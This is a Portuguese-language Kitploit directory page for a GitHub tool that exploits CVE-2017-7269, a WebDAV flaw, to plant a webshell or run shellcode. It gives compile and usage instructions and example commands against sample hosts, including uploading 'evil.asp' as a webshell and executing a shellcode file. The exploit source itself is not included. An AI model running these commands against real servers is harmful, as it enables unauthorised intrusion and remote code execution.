Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2017-7269-tool — CVE-2017-7269 to webshell or shellcode loader | Kitploit
Ferramentas/GitHubGitHub/zcgonvh/cve-2017-7269-tool
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubzcgonvh/cve-2017-7269-tool

cve-2017-7269-tool

CVE-2017-7269 to webshell or shellcode loader

Ver Repositório
8828há 9 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ferramenta de webshell e shellcode cve-2017-7269

compilação

root@kitploit:~
csc cve-2017-7269.cs

uso

root@kitploit:~
CVE-2017-7269 <url> [parms]

Cabeçalho:
-h <host>       define o host para o cabeçalho [If]
-p <port>       define a porta para o cabeçalho [If]
-s <scheme>     define o esquema para o cabeçalho [If]
-l <length>     comprimento do caminho físico

WebShell:
-w <webshell>   envia webshell para o servidor
-wp <shellpath> caminho para salvar o webshell

ShellCode:
-c <shellcode>  executa o shellcode

Diversos:
-t      testa apenas vulnerabilidade.
-e      sai do processo ao obter shell ou testar
-k      mata o alvo (equivalente a -e e -t)

exemplo

root@kitploit:~
CVE-2017-7269 http://192.168.1.1/
CVE-2017-7269 http://192.168.1.1/ -l 19
CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin
Baixar ferramenta